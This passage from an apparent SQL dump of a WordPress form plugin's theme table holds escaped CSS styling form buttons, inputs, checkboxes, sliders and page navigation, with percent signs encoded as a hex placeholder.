vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #33016B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #33016B;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #33016B;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #33016B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #33016B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #33016A ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #33016B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #320169 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #33016A 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #33016B ), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #320169 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #33016A )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #33016B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #320169 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #33016A 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #33016B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #320169 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #33016A 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #33016B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #320169 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #33016A 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\nbackground: linear-gradient(to right, #33016B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #320169 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #33016A 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: \" \";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n',0),(27,'Theme 07 transparent (burlywood button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #E6C18B;\r\nmargin-bottom: 10px;\r\ncolor: #E6C18B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #E6C18B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n} \r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #E6C18B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #267EA9;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #267EA9;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: 